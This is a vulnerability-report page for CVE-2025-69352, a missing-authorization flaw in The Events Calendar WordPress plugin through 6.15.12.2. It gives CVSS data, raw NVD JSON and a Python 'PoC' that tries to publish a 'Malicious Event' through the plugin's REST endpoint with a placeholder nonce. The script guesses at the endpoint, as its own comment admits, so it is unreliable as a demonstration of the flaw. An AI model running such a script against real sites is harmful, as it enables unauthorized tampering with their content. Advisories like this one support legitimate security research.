Security Vulnerability Report
中文
CVE-2025-69352 CVSS 5.4 MEDIUM

CVE-2025-69352

Published: 2026-01-06 17:15:48
Last Modified: 2026-04-27 19:16:42

Description

Missing Authorization vulnerability in StellarWP The Events Calendar the-events-calendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Events Calendar: from n/a through <= 6.15.12.2.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

The Events Calendar (the-events-calendar) <= 6.15.12.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69352 PoC - Missing Authorization in The Events Calendar # Affected: The Events Calendar <= 6.15.12.2 import requests import sys TARGET_URL = "http://target-wordpress-site.com" # Replace with actual vulnerable endpoint found in the plugin VULNERABLE_ENDPOINT = "/wp-json/tribe/events/v1/events" def exploit_cve_2025_69352(): """ This PoC demonstrates the missing authorization vulnerability. An attacker with low privileges can access admin-only functions. """ headers = { "Content-Type": "application/json", "X-WP-Nonce": "attacker-obtained-nonce" # May be obtainable without auth } # Example: Try to access or modify event data without proper authorization payload = { "title": "Malicious Event", "description": "Injected content via missing authorization", "start_date": "2025-01-01 00:00:00", "end_date": "2025-01-01 01:00:00", "status": "publish" } print("[*] Testing CVE-2025-69352 - Missing Authorization in The Events Calendar") print(f"[*] Target: {TARGET_URL}") # Step 1: Identify the vulnerable endpoint response = requests.get(f"{TARGET_URL}{VULNERABLE_ENDPOINT}", headers=headers) if response.status_code == 200: print("[+] Vulnerable endpoint accessible without proper authorization check") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Request returned status: {response.status_code}") # Step 2: Try to modify event data with low privilege account response = requests.post( f"{TARGET_URL}{VULNERABLE_ENDPOINT}", json=payload, headers=headers ) if response.status_code in [200, 201]: print("[!] VULNERABLE: Unauthorized event creation/modification possible") print(f"[!] Event created: {response.json()}") else: print(f"[-] Request blocked with status: {response.status_code}") if __name__ == "__main__": exploit_cve_2025_69352()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69352", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:47.723", "lastModified": "2026-04-27T19:16:41.530", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in StellarWP The Events Calendar the-events-calendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Events Calendar: from n/a through <= 6.15.12.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/the-events-calendar/vulnerability/wordpress-the-events-calendar-plugin-6-15-12-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}